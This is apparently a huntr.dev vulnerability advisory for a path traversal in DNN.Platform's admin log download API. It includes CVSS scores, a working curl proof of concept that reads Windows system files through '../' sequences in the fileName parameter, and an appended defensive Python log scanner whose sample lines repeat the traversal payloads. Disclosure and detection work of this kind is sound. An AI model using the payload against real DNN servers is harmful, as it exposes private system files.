
huntr: 74918F40-DC11-4218-ABEF-064EB71A0703

Path traversal on administrative account

2022-08-09 07:50:23
ephvuln
www.huntr.dev

CVSS3: 4.9 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: HIGH
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

CVSS2: 3.3 Low
Access Vector: NETWORK
Access Complexity: LOW
Authentication: MULTIPLE
Confidentiality Impact: PARTIAL
Integrity Impact: NONE
Availability Impact: NONE
AV:N/AC:L/Au:M/C:P/I:N/A:N

EPSS: 0.001 Low
Percentile: 25.4%

Description

Relative path traversal in the log download functionality of DNN.Platform. An administrative account can download any system file. This could allow direct read access to files that are not meant to be accessible directly by the platform.

Proof of Concept

Log in as an administrative user.
The payload was tested on DNN 9.1.1.

curl -i -s -k -X $'GET' \
    -H $'Host: <HOST>' \
    -b $'.DOTNETNUKE=<ADMIN_SESSION>' \
    $'https://<HOST>/<PATH_TO_DNN>/API/PersonaBar/ServerSettingsLogs/GetLogFile?fileName=../../../../../../Windows/win.ini'

Replace <HOST>, <ADMIN_SESSION> and <PATH_TO_DNN> with the appropriate values. <PATH_TO_DNN> may include the language selection. Files other than Windows/win.ini may be leaked, such as windows/system32/drivers/etc/hosts. Adjust the number of "../" segments depending on the local configuration.
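
For defenders reviewing web server logs for requests of the kind described above, the following is an added detection example, not code from the report or from DNN. It assumes IIS W3C logs with a #Fields header containing cs-uri-stem and cs-uri-query, and assumes that a legitimate fileName value is a bare file name; the sample log lines are constructed.

```python
from urllib.parse import parse_qs, unquote

# Endpoint from the advisory; compared lowercase because IIS paths are case-insensitive.
ENDPOINT = "/api/personabar/serversettingslogs/getlogfile"

def fully_decode(value):
    """Percent-decode until stable so double-encoded separators are exposed."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return value

def is_suspicious(name):
    """Assumption: a legitimate fileName is a bare file name with no path parts."""
    return ".." in name or any(ch in name for ch in "/\\:")

def flag_requests(log_lines):
    """Return (line_number, decoded fileName) for log downloads that carry a path."""
    fields, hits = [], []
    for number, line in enumerate(log_lines, 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if line.startswith("#") or not line.strip():
            continue
        row = dict(zip(fields, line.split()))
        # endswith() tolerates the <PATH_TO_DNN> / language prefix noted above.
        if not row.get("cs-uri-stem", "").lower().endswith(ENDPOINT):
            continue
        query = parse_qs(row.get("cs-uri-query", ""), keep_blank_values=True)
        for key, values in query.items():
            if key.lower() != "filename":
                continue
            for value in map(fully_decode, values):
                if is_suspicious(value):
                    hits.append((number, value))
    return hits

# Constructed sample log (not taken from a real server).
SAMPLE = """#Fields: date time cs-method cs-uri-stem cs-uri-query cs-username sc-status
2022-08-09 07:41:02 GET /API/PersonaBar/ServerSettingsLogs/GetLogFile fileName=2022.08.09.log.resources admin 200
2022-08-09 07:42:10 GET /en-us/API/PersonaBar/ServerSettingsLogs/GetLogFile fileName=../../../../../../Windows/win.ini admin 200
2022-08-09 07:42:31 GET /API/PersonaBar/ServerSettingsLogs/GetLogFile fileName=%252e%252e%255cWindows%255cwin.ini admin 200
2022-08-09 07:43:00 GET /Default.aspx - admin 200""".splitlines()

if __name__ == "__main__":
    for number, name in flag_requests(SAMPLE):
        print(f"line {number}: fileName={name!r}")
```

Because the endpoint requires an administrative session, a hit also identifies which admin account (cs-username) to review.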
